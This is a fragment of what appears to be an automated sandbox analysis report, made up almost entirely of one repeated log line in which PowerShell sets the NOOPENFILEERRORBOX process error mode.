              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
